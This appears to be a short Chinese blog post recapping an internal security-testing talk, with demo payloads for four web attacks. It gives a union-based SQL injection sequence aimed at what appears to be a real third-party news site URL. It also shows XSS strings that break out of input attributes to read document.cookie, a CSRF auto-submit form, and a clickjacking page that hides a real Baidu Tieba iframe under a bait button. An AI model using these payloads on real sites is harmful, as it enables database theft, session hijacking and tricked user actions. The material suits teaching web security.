来自公司内部的一次安全测试分享
但是感觉我讲的时候很多地方没说清楚,没有掌握好节奏,演示案例也有些匆忙
果然也是需要多练习的事情,任何方面
SQL注入的案例
http://xian.gjnews.cn/list.php?page=4&id=524 http://xian.gjnews.cn/list.php?page=4&id=524 order by 17 http://xian.gjnews.cn/list.php?page=4&id=524 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 'hello' database()
XSS的案例
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <input type="text" name="name" value="xxxx" > <!-- "/><script>alert(document.cookie)</script><!- --> <input type="text" name="name" value=""/><script>alert(/xss/)</script><!-"> <!-- " onclick ="alert(/雅蠛蝶~~/) --> <input type="text" name="address1" value=""onclick ="alert(/雅蠛蝶~~/)">
CSRF案例
<html> <form enctype="application/x-www-form-urlencoded" method="POST" action="https://xxxx/add"> <table><tr><td>item_id</td><td><input type="text" value="40861" name="item_id"></td></tr> </table><input type="submit" value="点我"></form> </html>
点击劫持案例
<!DOCTYPE HTML> <html> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <head> <title>点击劫持</title> <style> html,body,iframe{ display: block; height: 100%; width: 100%; margin: 0; padding: 0; border:none; } iframe{ opacity:0; filter:alpha(opacity=0); position:absolute; z-index:2; /*opacity: 0.3;*/ } button{ position:absolute; top: 552px; left: 500px; z-index: 1; width: 72px; height: 26px; } </style> </head> <body> 那些不能说的秘密 <button>查看详情</button> <iframe src="http://tieba.baidu.com/f?kw=%C3%C0%C5%AE"></iframe> </body> </html>